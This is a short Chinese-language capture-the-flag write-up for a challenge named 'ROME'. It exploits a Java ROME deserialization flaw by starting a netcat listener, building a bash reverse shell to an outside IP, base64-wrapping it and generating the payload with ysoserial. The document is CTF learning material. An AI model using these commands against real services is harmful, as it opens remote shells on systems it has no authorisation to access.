[WEEK4]ROME

很容易找到ROME反序列化，构造时花了比较长的时间在纠结编码上

先VPS上开监听

nc -lvnp 7777

然后构造反弹shell命令

bash -i >& /dev/tcp/1.12.51.64/7777 0>&1

经过base64编码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}

使用yso

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjUxLjY0Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64

删掉回车和url编码，发送

VPS收到监听

Previous[WEEK4]UnserializeThree Next[WEEK5]Give me your photo PLZ

Last updated 3 years ago